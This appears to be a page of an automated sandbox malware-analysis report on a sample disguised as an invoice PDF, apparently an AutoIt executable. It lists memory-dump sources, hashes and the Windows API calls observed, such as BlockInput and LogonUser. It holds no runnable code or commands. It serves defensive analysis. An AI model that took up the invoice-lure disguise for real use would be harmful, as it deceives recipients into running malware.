                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                              • String ID:
                                                                              • API String ID: 901099227-0
                                                                              • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                              • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                              • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                              • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                              • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                              • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                              • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                              • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0vH$HH
                                                                              • API String ID: 0-728391547
                                                                              • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                              • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                              • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                              • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID:
                                                                              • API String ID: 2102423945-0
                                                                              • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                              • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                              • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                              • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                              APIs
                                                                              • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Proc
                                                                              • String ID:
                                                                              • API String ID: 2346855178-0
                                                                              • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                              • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                              • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                              • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                              APIs
                                                                              • BlockInput.USER32(00000001), ref: 0045A272
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: BlockInput
                                                                              • String ID:
                                                                              • API String ID: 3456056419-0
                                                                              • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                              • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                              • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                              • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                              • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                              • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                              • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                              • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                              • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                              • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                              • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                              • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                              • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                              • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                              • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                              • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                              • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                              • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                              • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                              • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                              • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                              • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                              • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                              • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                              • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                              • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                              • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                              • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 004593D7
                                                                              • DeleteObject.GDI32(?), ref: 004593F1
                                                                              • DestroyWindow.USER32(?), ref: 00459407
                                                                              • GetDesktopWindow.USER32 ref: 0045942A
                                                                              • GetWindowRect.USER32(00000000), ref: 00459431
                                                                              • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                              • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                              • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                              • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                              • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                              • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                              • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                              • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                              • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                              • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                              • _wcslen.LIBCMT ref: 00459800
                                                                              • _wcscpy.LIBCMT ref: 0045981F
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                              • GetDC.USER32(?), ref: 004598DE
                                                                              • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                              • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                              • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 4040870279-2373415609
                                                                              • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                              • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                              • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                              • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 00441E64
                                                                              • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                              • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                              • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                              • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                              • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                              • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                              • DeleteObject.GDI32(?), ref: 00441F1B
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                              • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                              • String ID:
                                                                              • API String ID: 69173610-0
